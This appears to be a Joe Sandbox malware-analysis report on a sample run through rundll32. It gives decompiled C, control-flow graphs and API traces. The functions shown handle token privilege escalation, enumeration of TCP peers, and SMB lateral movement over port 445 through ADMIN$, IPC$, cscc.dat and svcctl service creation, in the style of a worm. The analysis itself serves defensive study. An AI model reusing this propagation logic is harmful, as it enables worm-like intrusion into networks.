                                                                                                            • Part of subcall function 04A4554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A4558E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                                                          • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                          • API String ID: 1016975789-3730106045
                                                                                                          • Opcode ID: 89fbcba9bb4723f472add4de0b5d63bc0aefe8cc8e090b1abbb6fc53a773a268
                                                                                                          • Instruction ID: aeb138fce49ef536dd610c0184a7304b7cd83127bacf871f5437bfdff2bc9817
                                                                                                          • Opcode Fuzzy Hash: 89fbcba9bb4723f472add4de0b5d63bc0aefe8cc8e090b1abbb6fc53a773a268
                                                                                                          • Instruction Fuzzy Hash: 5281D8B9500249BFFB11AFB4DE84EAE3BACFFE5344F044465F901A6191C778AE458B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 422 4a4a1a9-4a4a1c7 423 4a4a1d0-4a4a1fa GetProcessHeap HeapAlloc 422->423 424 4a4a1c9-4a4a1cb call 4a4a016 422->424 426 4a4a200-4a4a213 GetProcessHeap HeapAlloc 423->426 427 4a4a32a-4a4a330 423->427 424->423 426->427 428 4a4a219-4a4a229 call 4a46b0e 426->428 428->427 431 4a4a22f-4a4a235 428->431 432 4a4a245-4a4a24c 431->432 433 4a4a271 432->433 434 4a4a24e-4a4a260 CreateThread 432->434 437 4a4a275 433->437 435 4a4a266-4a4a26f 434->435 436 4a4a322-4a4a325 call 4a46b46 434->436 435->437 436->427 438 4a4a277-4a4a27b 437->438 440 4a4a286-4a4a2af GetModuleHandleA GetProcAddress 438->440 441 4a4a27d-4a4a284 438->441 440->436 443 4a4a2b1-4a4a2b6 440->443 441->438 441->440 444 4a4a2d3-4a4a2d6 443->444 445 4a4a2b8-4a4a2be 443->445 447 4a4a2d8-4a4a2e7 CloseHandle 444->447 448 4a4a2ea-4a4a2f7 GetProcessHeap HeapAlloc 444->448 446 4a4a2c0-4a4a2c5 445->446 449 4a4a2c7-4a4a2ca 446->449 450 4a4a2ce-4a4a2d1 446->450 447->448 448->436 451 4a4a2f9-4a4a30c GetProcessHeap HeapAlloc 448->451 449->446 452 4a4a2cc 449->452 450->448 451->436 453 4a4a30e-4a4a315 call 4a46ad0 451->453 452->448 455 4a4a31a-4a4a31c 453->455 455->436 456 4a4a237-4a4a243 455->456 456->432
                                                                                                          C-Code - Quality: 72%
                                                                                                          			E04A4A1A9() {
                                                                                                          				signed int _v8;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                          				signed int _v16;
                                                                                                          				void _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _v48;
                                                                                                          				signed int _v52;
                                                                                                          				signed int _t46;
                                                                                                          				void* _t53;
                                                                                                          				intOrPtr _t54;
                                                                                                          				signed int _t55;
                                                                                                          				_Unknown_base(*)()* _t57;
                                                                                                          				signed int _t58;
                                                                                                          				void* _t63;
                                                                                                          				void* _t64;
                                                                                                          				void* _t65;
                                                                                                          				signed int _t67;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t75;
                                                                                                          				signed int _t78;
                                                                                                          				void* _t82;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t84;
                                                                                                          				void** _t86;
                                                                                                          				void* _t92;
                                                                                                          
                                                                                                          				_v24 =  *0x4a57bb8;
                                                                                                          				_t46 =  !( *0x4a57bc0 >> 2) & 0x00000001;
                                                                                                          				_v20 = _t46;
                                                                                                          				if(_t46 != 0) {
                                                                                                          					_push(0); // executed
                                                                                                          					E04A4A016(); // executed
                                                                                                          				}
                                                                                                          				_v52 = _v52 & 0x00000000;
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                          				if(_t82 == 0) {
                                                                                                          					L27:
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					 *_t82 = _v20;
                                                                                                          					_t53 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                          					 *(_t82 + 4) = _t53;
                                                                                                          					_t95 = _t53;
                                                                                                          					if(_t53 == 0) {
                                                                                                          						goto L27;
                                                                                                          					}
                                                                                                          					_t54 = E04A46B0E(_v24, _t95, _t53);
                                                                                                          					_t75 = 0;
                                                                                                          					_v28 = _t54;
                                                                                                          					if(_t54 == 0) {
                                                                                                          						goto L27;
                                                                                                          					}
                                                                                                          					_v8 = 0;
                                                                                                          					_v16 = 0;
                                                                                                          					while(1) {
                                                                                                          						_v12 = _t75;
                                                                                                          						if(_v8 == 6) {
                                                                                                          							goto L10;
                                                                                                          						}
                                                                                                          						_t65 = CreateThread(_t75, _t75, E04A4A112, _t82, _t75, _t75); // executed
                                                                                                          						if(_t65 == 0) {
                                                                                                          							L26:
                                                                                                          							E04A46B46(_v28);
                                                                                                          							goto L27;
                                                                                                          						}
                                                                                                          						 *(_t92 + _v8 * 4 - 0x30) = _t65;
                                                                                                          						_t75 = 0;
                                                                                                          						L11:
                                                                                                          						_t55 = 0;
                                                                                                          						while( *((intOrPtr*)(_t92 + _t55 * 4 - 0x30)) != _t75) {
                                                                                                          							_v12 =  &(_v12->nLength);
                                                                                                          							_t55 = _t55 + 1;
                                                                                                          							if(_t55 != 6) {
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						_t57 = GetProcAddress(GetModuleHandleA("kernel32"), "WaitForMultipleObjects");
                                                                                                          						_t84 = _v12;
                                                                                                          						_t58 =  *_t57(_t84,  &_v52, 0, _v16);
                                                                                                          						if(_t58 == 0xffffffff) {
                                                                                                          							goto L26;
                                                                                                          						}
                                                                                                          						if(_t58 != 0x102) {
                                                                                                          							__eflags = _t58 - _t84 - 1;
                                                                                                          							if(_t58 <= _t84 - 1) {
                                                                                                          								_t86 = _t92 + _t58 * 4 - 0x30;
                                                                                                          								_v8 = _t58;
                                                                                                          								CloseHandle( *_t86);
                                                                                                          								 *_t86 =  *_t86 & 0x00000000;
                                                                                                          								__eflags =  *_t86;
                                                                                                          							}
                                                                                                          							L23:
                                                                                                          							_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                          							if(_t82 == 0) {
                                                                                                          								goto L26;
                                                                                                          							}
                                                                                                          							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                          							_t77 = _v20;
                                                                                                          							 *(_t82 + 4) = _t63;
                                                                                                          							 *_t82 = _v20;
                                                                                                          							if(_t63 == 0) {
                                                                                                          								goto L26;
                                                                                                          							}
                                                                                                          							_t64 = E04A46AD0(_t77, _t63); // executed
                                                                                                          							if(_t64 != 0) {
                                                                                                          								_t75 = 0;
                                                                                                          								__eflags = 0;
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							goto L26;
                                                                                                          						}
                                                                                                          						_t78 = 6;
                                                                                                          						_v8 = _t78;
                                                                                                          						_t67 = 0;
                                                                                                          						while( *((intOrPtr*)(_t92 + _t67 * 4 - 0x30)) != 0) {
                                                                                                          							_t67 = _t67 + 1;
                                                                                                          							if(_t67 != _t78) {
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							goto L23;
                                                                                                          						}
                                                                                                          						_v8 = _t67;
                                                                                                          						goto L23;
                                                                                                          						L10:
                                                                                                          						_t18 =  &_v16;
                                                                                                          						 *_t18 = _v16 | 0xffffffff;
                                                                                                          						__eflags =  *_t18;
                                                                                                          						goto L11;
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}



























                                                                                                          0x04a4a1b4
                                                                                                          0x04a4a1c1
                                                                                                          0x04a4a1c4
                                                                                                          0x04a4a1c7
                                                                                                          0x04a4a1c9
                                                                                                          0x04a4a1cb
                                                                                                          0x04a4a1cb
                                                                                                          0x04a4a1d0
                                                                                                          0x04a4a1e2
                                                                                                          0x04a4a1e3
                                                                                                          0x04a4a1e4
                                                                                                          0x04a4a1e5
                                                                                                          0x04a4a1ea
                                                                                                          0x04a4a1f6
                                                                                                          0x04a4a1fa
                                                                                                          0x04a4a32a
                                                                                                          0x04a4a330
                                                                                                          0x04a4a200
                                                                                                          0x04a4a207
                                                                                                          0x04a4a20c
                                                                                                          0x04a4a20e
                                                                                                          0x04a4a211
                                                                                                          0x04a4a213
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a21d
                                                                                                          0x04a4a222
                                                                                                          0x04a4a224
                                                                                                          0x04a4a229
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a22f
                                                                                                          0x04a4a232
                                                                                                          0x04a4a245
                                                                                                          0x04a4a249
                                                                                                          0x04a4a24c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a258
                                                                                                          0x04a4a260
                                                                                                          0x04a4a322
                                                                                                          0x04a4a325
                                                                                                          0x00000000
                                                                                                          0x04a4a325
                                                                                                          0x04a4a269
                                                                                                          0x04a4a26d
                                                                                                          0x04a4a275
                                                                                                          0x04a4a275
                                                                                                          0x04a4a277
                                                                                                          0x04a4a27d
                                                                                                          0x04a4a280
                                                                                                          0x04a4a284
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a284
                                                                                                          0x04a4a297
                                                                                                          0x04a4a2a0
                                                                                                          0x04a4a2aa
                                                                                                          0x04a4a2af
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a2b6
                                                                                                          0x04a4a2d4
                                                                                                          0x04a4a2d6
                                                                                                          0x04a4a2d8
                                                                                                          0x04a4a2de
                                                                                                          0x04a4a2e1
                                                                                                          0x04a4a2e7
                                                                                                          0x04a4a2e7
                                                                                                          0x04a4a2e7
                                                                                                          0x04a4a2ea
                                                                                                          0x04a4a2f3
                                                                                                          0x04a4a2f7
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a300
                                                                                                          0x04a4a302
                                                                                                          0x04a4a305
                                                                                                          0x04a4a308
                                                                                                          0x04a4a30c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a315
                                                                                                          0x04a4a31c
                                                                                                          0x04a4a243
                                                                                                          0x04a4a243
                                                                                                          0x00000000
                                                                                                          0x04a4a243
                                                                                                          0x00000000
                                                                                                          0x04a4a31c
                                                                                                          0x04a4a2ba
                                                                                                          0x04a4a2bb
                                                                                                          0x04a4a2be
                                                                                                          0x04a4a2c0
                                                                                                          0x04a4a2c7
                                                                                                          0x04a4a2ca
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a2cc
                                                                                                          0x04a4a2ce
                                                                                                          0x00000000
                                                                                                          0x04a4a271
                                                                                                          0x04a4a271
                                                                                                          0x04a4a271
                                                                                                          0x04a4a271
                                                                                                          0x00000000
                                                                                                          0x04a4a271
                                                                                                          0x04a4a245

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04A4A1EB
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4A1F4
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04A4A209
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4A20C
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04A4A112,00000000,00000000,00000000), ref: 04A4A258
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 04A4A290
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 04A4A297
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04A4A2E1
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04A4A2EE
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4A2F1
                                                                                                            • Part of subcall function 04A4A016: GetCurrentThread.KERNEL32 ref: 04A4A035
                                                                                                            • Part of subcall function 04A4A016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A4A1D0,00000000), ref: 04A4A03C
                                                                                                            • Part of subcall function 04A4A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04A4A059
                                                                                                            • Part of subcall function 04A4A016: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04A4A0F5
                                                                                                            • Part of subcall function 04A4A016: CloseHandle.KERNEL32(0000FFFF,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04A4A105
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04A4A2FD
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4A300
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                                                          • String ID: Oqt Uqt0Xqt$WaitForMultipleObjects$kernel32
                                                                                                          • API String ID: 2880803415-3596626194
                                                                                                          • Opcode ID: 94d5adfb32b3ea27ba8b4ff23234939de4eb483f7a572ee0740cafae45ed3c82
                                                                                                          • Instruction ID: 8a423c1ceb84097dc4b6f9d8a9c1eaf336c11223f1dcfa12363198a59fe8a1cd
                                                                                                          • Opcode Fuzzy Hash: 94d5adfb32b3ea27ba8b4ff23234939de4eb483f7a572ee0740cafae45ed3c82
                                                                                                          • Instruction Fuzzy Hash: AE41A075E90206ABEB14DFB8DD45BAEB774FBC8300F504929E512EB290EB75B9019B10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 457 4a45337-4a4535f HeapAlloc 459 4a45365-4a4538f rand 457->459 460 4a454fd-4a45504 457->460 461 4a45391-4a45397 459->461 462 4a45398-4a453bf rand socket 459->462 461->462 463 4a453c5-4a45400 htons inet_addr connect 462->463 464 4a454ed-4a454f6 462->464 465 4a45406-4a45416 call 4a41ca3 463->465 466 4a454df 463->466 464->460 471 4a454dc 465->471 472 4a4541c-4a45432 call 4a42191 465->472 467 4a454e6-4a454e7 closesocket 466->467 467->464 471->466 475 4a454c6 472->475 476 4a45438-4a45457 call 4a446c7 call 4a421dc 472->476 478 4a454cd-4a454d2 call 4a41dd1 475->478 483 4a4545c-4a45460 476->483 482 4a454d7-4a454da 478->482 482->467 483->478 484 4a45462-4a4547c call 4a41eb9 483->484 484->478 487 4a4547e-4a45492 call 4a42054 484->487 487->478 490 4a45494-4a454aa call 4a44ab5 487->490 490->478 493 4a454ac-4a454be call 4a4516b 490->493 493->478 496 4a454c0-4a454c4 493->496 496->478
                                                                                                          C-Code - Quality: 58%
                                                                                                          			E04A45337(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                          				char _v12;
                                                                                                          				void* _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				intOrPtr _v36;
                                                                                                          				short _v38;
                                                                                                          				char _v40;
                                                                                                          				void* __edi;
                                                                                                          				signed int _t54;
                                                                                                          				int _t56;
                                                                                                          				short _t60;
                                                                                                          				char* _t61;
                                                                                                          				void* _t64;
                                                                                                          				void* _t66;
                                                                                                          				signed int _t70;
                                                                                                          				int _t84;
                                                                                                          				void* _t85;
                                                                                                          				void* _t89;
                                                                                                          
                                                                                                          				_t85 = __ecx;
                                                                                                          				_v20 = 0xbadf00d;
                                                                                                          				_t89 = HeapAlloc(GetProcessHeap(), 8, 0x24);
                                                                                                          				_v16 = _t89;
                                                                                                          				if(_t89 == 0) {
                                                                                                          					L19:
                                                                                                          					return _v20;
                                                                                                          				}
                                                                                                          				 *((intOrPtr*)(_t89 + 4)) = 0x424d53fe;
                                                                                                          				 *((char*)(_t89 + 0xd)) = 0x18;
                                                                                                          				 *((short*)(_t89 + 0xe)) = 0x4801;
                                                                                                          				 *((short*)(_t89 + 0x1e)) = 0xfeff;
                                                                                                          				_t54 = rand() & 0x80001fff;
                                                                                                          				if(_t54 < 0) {
                                                                                                          					_t54 = (_t54 - 0x00000001 | 0xffffe000) + 1;
                                                                                                          				}
                                                                                                          				 *((short*)(_t89 + 0x22)) = _t54 + 0x1000;
                                                                                                          				 *((intOrPtr*)(_t89 + 9)) = 0x300;
                                                                                                          				_t56 = rand();
                                                                                                          				 *(_t89 + 0x10) = _t56;
                                                                                                          				__imp__#23(2, 1, 6); // executed
                                                                                                          				_t84 = _t56;
                                                                                                          				if(_t84 == 0xffffffff) {
                                                                                                          					L18:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t89);
                                                                                                          					goto L19;
                                                                                                          				}
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				_t60 = 2;
                                                                                                          				_v40 = _t60;
                                                                                                          				__imp__#9(0x1bd);
                                                                                                          				_v38 = _t60;
                                                                                                          				__imp__#11(_a4);
                                                                                                          				_v36 = 0;
                                                                                                          				_t61 =  &_v40;
                                                                                                          				__imp__#4(_t84, _t61, 0x10); // executed
                                                                                                          				if(_t61 == 0xffffffff) {
                                                                                                          					L16:
                                                                                                          					_v20 = 0xc0c0c0c;
                                                                                                          					L17:
                                                                                                          					__imp__#3(_t84);
                                                                                                          					goto L18;
                                                                                                          				}
                                                                                                          				_t64 = E04A41CA3(_t84,  &_v16,  &_v20); // executed
                                                                                                          				if(_t64 == 0) {
                                                                                                          					_t89 = _v16;
                                                                                                          					goto L16;
                                                                                                          				}
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_t88 =  &_v16;
                                                                                                          				_t66 = E04A42191( &_v16, _t84, _a4,  &_v24); // executed
                                                                                                          				if(_t66 == 0) {
                                                                                                          					_v20 = 0xc0c0c0c;
                                                                                                          				} else {
                                                                                                          					_t90 = _v16;
                                                                                                          					_t70 = E04A446C7(_t85, _t84, _a4, _v16,  &_v24, _v20); // executed
                                                                                                          					_v20 = _t70;
                                                                                                          					E04A421DC(_t84, _t88,  &_v24); // executed
                                                                                                          					if(_v20 == 0) {
                                                                                                          						_v20 = 0xf0f0f0f;
                                                                                                          						if(E04A41EB9(_t84, _t88, _a4, "ADMIN$") != 0 && E04A42054(_t84, _t90,  &_v12, "cscc.dat", 1) == 0 && E04A44AB5(_a20, _t85, _t84, _t90,  &_v24, _a12, _a16) != 0 && E04A4516B(_t85, _t84, _t90, _a4, _a8, _a12) != 0) {
                                                                                                          							_v20 = _v20 & 0x00000000;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				E04A41DD1(_t85, _t84,  &_v16); // executed
                                                                                                          				_t89 = _v16;
                                                                                                          				goto L17;
                                                                                                          			}





















                                                                                                          0x04a45337
                                                                                                          0x04a45344
                                                                                                          0x04a45358
                                                                                                          0x04a4535a
                                                                                                          0x04a4535f
                                                                                                          0x04a454fd
                                                                                                          0x04a45504
                                                                                                          0x04a45504
                                                                                                          0x04a4536b
                                                                                                          0x04a45372
                                                                                                          0x04a4537b
                                                                                                          0x04a45384
                                                                                                          0x04a4538a
                                                                                                          0x04a4538f
                                                                                                          0x04a45397
                                                                                                          0x04a45397
                                                                                                          0x04a4539d
                                                                                                          0x04a453a1
                                                                                                          0x04a453a8
                                                                                                          0x04a453b0
                                                                                                          0x04a453b4
                                                                                                          0x04a453ba
                                                                                                          0x04a453bf
                                                                                                          0x04a454ed
                                                                                                          0x04a454f7
                                                                                                          0x00000000
                                                                                                          0x04a454f7
                                                                                                          0x04a453ca
                                                                                                          0x04a453cb
                                                                                                          0x04a453cc
                                                                                                          0x04a453cf
                                                                                                          0x04a453d0
                                                                                                          0x04a453d6
                                                                                                          0x04a453da
                                                                                                          0x04a453e3
                                                                                                          0x04a453e7
                                                                                                          0x04a453ed
                                                                                                          0x04a453f2
                                                                                                          0x04a453f7
                                                                                                          0x04a45400
                                                                                                          0x04a454df
                                                                                                          0x04a454df
                                                                                                          0x04a454e6
                                                                                                          0x04a454e7
                                                                                                          0x00000000
                                                                                                          0x04a454e7
                                                                                                          0x04a4540f
                                                                                                          0x04a45416
                                                                                                          0x04a454dc
                                                                                                          0x00000000
                                                                                                          0x04a454dc
                                                                                                          0x04a4541c
                                                                                                          0x04a45427
                                                                                                          0x04a4542b
                                                                                                          0x04a45432
                                                                                                          0x04a454c6
                                                                                                          0x04a45438
                                                                                                          0x04a4543b
                                                                                                          0x04a45447
                                                                                                          0x04a4544c
                                                                                                          0x04a45457
                                                                                                          0x04a45460
                                                                                                          0x04a4546e
                                                                                                          0x04a4547c
                                                                                                          0x04a454c0
                                                                                                          0x04a454c0
                                                                                                          0x04a4547c
                                                                                                          0x04a45460
                                                                                                          0x04a454d2
                                                                                                          0x04a454d7
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74716840,00000000,?,?,?,?,04A4943A,?), ref: 04A4534B
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A,?), ref: 04A45352
                                                                                                          • rand.MSVCRT ref: 04A45388
                                                                                                          • rand.MSVCRT ref: 04A453A8
                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 04A453B4
                                                                                                          • htons.WS2_32(000001BD), ref: 04A453DA
                                                                                                          • inet_addr.WS2_32(?), ref: 04A453E7
                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 04A453F7
                                                                                                            • Part of subcall function 04A4516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04A451D3
                                                                                                            • Part of subcall function 04A4516B: HeapAlloc.KERNEL32(00000000), ref: 04A451DC
                                                                                                            • Part of subcall function 04A4516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04A45205
                                                                                                            • Part of subcall function 04A4516B: HeapAlloc.KERNEL32(00000000), ref: 04A45208
                                                                                                            • Part of subcall function 04A4516B: rand.MSVCRT ref: 04A4521B
                                                                                                            • Part of subcall function 04A4516B: rand.MSVCRT ref: 04A45226
                                                                                                            • Part of subcall function 04A4516B: rand.MSVCRT ref: 04A4522F
                                                                                                            • Part of subcall function 04A4516B: sprintf.MSVCRT ref: 04A45246
                                                                                                            • Part of subcall function 04A4516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45252
                                                                                                            • Part of subcall function 04A4516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45255
                                                                                                          • closesocket.WS2_32(00000000), ref: 04A454E7
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04A4943A,?), ref: 04A454F0
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A,?), ref: 04A454F7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                                                          • String ID: Oqt Uqt0Xqt$ADMIN$$cscc.dat
                                                                                                          • API String ID: 228017060-3299923155
                                                                                                          • Opcode ID: afc7b462179b57f0fba921514e331750b9276b53e3898ff75dc21784484d9237
                                                                                                          • Instruction ID: cb4456af5e275b484215ad60ebf0480711757a25f27a2b1bc68952337b6c6356
                                                                                                          • Opcode Fuzzy Hash: afc7b462179b57f0fba921514e331750b9276b53e3898ff75dc21784484d9237
                                                                                                          • Instruction Fuzzy Hash: A1517A75900359BBEB109FA4CD48EEFBBB9EFC8355F004904FA15AB251D375AA09CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 537 4a4733c-4a47355 LoadLibraryW 538 4a47425-4a47429 537->538 539 4a4735b-4a4736d GetProcAddress 537->539 540 4a47414 GetLastError 539->540 541 4a47373-4a47392 RtlAllocateHeap 539->541 542 4a4741a-4a47424 FreeLibrary 540->542 541->542 544 4a47398-4a473ac GetExtendedTcpTable 541->544 542->538 545 4a47402-4a4740b 544->545 546 4a473ae-4a473b5 544->546 553 4a47412 545->553 546->545 547 4a473b7 546->547 549 4a473ba-4a473be 547->549 550 4a473f5-4a47400 549->550 551 4a473c0-4a473f2 wsprintfW call 4a46b95 549->551 550->545 550->549 551->550 553->542
                                                                                                          C-Code - Quality: 84%
                                                                                                          			E04A4733C(intOrPtr _a4) {
                                                                                                          				signed int _v8;
                                                                                                          				long _v12;
                                                                                                          				void* _v16;
                                                                                                          				struct HINSTANCE__* _v20;
                                                                                                          				short _v84;
                                                                                                          				void* __esi;
                                                                                                          				struct HINSTANCE__* _t20;
                                                                                                          				void* _t27;
                                                                                                          				signed int _t29;
                                                                                                          				void* _t41;
                                                                                                          				intOrPtr* _t45;
                                                                                                          				signed char* _t47;
                                                                                                          				void* _t50;
                                                                                                          				void* _t52;
                                                                                                          
                                                                                                          				_t41 = 0;
                                                                                                          				_t20 = LoadLibraryW(L"iphlpapi.dll");
                                                                                                          				_v20 = _t20;
                                                                                                          				if(_t20 != 0) {
                                                                                                          					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
                                                                                                          					if(_t45 == 0) {
                                                                                                          						GetLastError();
                                                                                                          					} else {
                                                                                                          						_v12 = 0x100000;
                                                                                                          						_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x100000); // executed
                                                                                                          						_t50 = _t27;
                                                                                                          						_v16 = _t50;
                                                                                                          						if(_t50 != 0) {
                                                                                                          							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
                                                                                                          							asm("sbb ebx, ebx");
                                                                                                          							_t41 =  ~_t29 + 1;
                                                                                                          							if(_t41 != 0) {
                                                                                                          								_v8 = _v8 & 0x00000000;
                                                                                                          								if( *_t50 > 0) {
                                                                                                          									_t7 = _t50 + 0x12; // 0x12
                                                                                                          									_t47 = _t7;
                                                                                                          									do {
                                                                                                          										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
                                                                                                          											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
                                                                                                          											_t52 = _t52 + 0x18;
                                                                                                          											E04A46B95( &_v84, 0, _a4);
                                                                                                          											_t50 = _v16;
                                                                                                          										}
                                                                                                          										_v8 = _v8 + 1;
                                                                                                          										_t47 =  &(_t47[0x14]);
                                                                                                          									} while (_v8 <  *_t50);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							RtlFreeHeap(GetProcessHeap(), 0, _t50); // executed
                                                                                                          						}
                                                                                                          					}
